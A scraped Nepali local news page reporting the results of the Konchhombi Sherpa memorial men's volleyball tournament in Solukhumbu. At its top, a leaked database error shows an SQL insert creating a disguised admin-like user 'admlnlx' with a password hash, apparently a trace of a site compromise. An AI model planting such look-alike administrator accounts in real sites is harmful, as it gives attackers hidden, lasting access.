WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BEc0/Xaz7F.pC9W2LsMqskPyQchRAL1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 22:30:41', '', 'admlnlx', 'admlnlx')

कोन्छोम्बी शेर्पा स्मृति कप पुरुष भलिबल प्रतियोगिताको उपाधि सोलुदुधकुन्ड नगरपालिका ११ लाई – Gaule Khabar

कोन्छोम्बी शेर्पा स्मृति कप पुरुष भलिबल प्रतियोगिताको उपाधि सोलुदुधकुन्ड नगरपालिका ११ लाई

कोन्छोम्बी शेर्पा स्मृति कप पुरुष भलिबल प्रतियोगिताको उपाधि सोलुदुधकुन्ड नगरपालिका ११ लाई

गाउँले न्युज, १२ साउन, सोलुखुम्बु । समाज सेवी स्वा कोन्छोम्बी शेर्पा स्मृति कप खुल्ला पुरुष भलिबल प्रतियोगिताको उपाधि सोलुदूधकुण्ड नगरपालिका ११ ले जितेको छ ।

स्वर्गीय कोन्छोम्बी शेर्पाको सम्झनामा खुम्जुङ युवा क्लवको आयोजनामा सञ्चालित प्रतियोगितामा घैयादेवी युवा क्लव समुह केरुङलाई हराउदै सोलुदुधकुन्ड नगरपालिका ११ तिङ्लाले उपाधी कब्जा गरेको हो ।

हिजो (शनिबार) सम्पन्न फाईनल खेलमा जलेश्वरी युवा समूह केरुङले तेश्रो स्थान हात पारेको छ । प्रथम, द्धितिय र तृतिय हुने समूहलाई क्रमशः नगद १ लाख, ६० हजार, ३० हजार को साथमा शिल्ड, मेडल र प्रमाणपत्र प्रदान गरिएको छ ।

सोलुदूधकुण्ड नगरपालिका ११ तिङ्ला समूहका सञ्जय बस्नेतलाई १० हजार नगदको साथमा शिल्ड, मेडल र प्रमाणपत्र सहित उत्कृष्ट चिनिए भने अनुशासनमा खुम्जुङ माध्यमिक विद्यालय खुम्जुङ समूहलाई शिल्ड र प्रमाणपत्र प्रदान गरिएको आयोजक समितिले जनाएको छ । प्रतियोगितामा जम्मा ९ समूहको सहभागिता जनाएको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका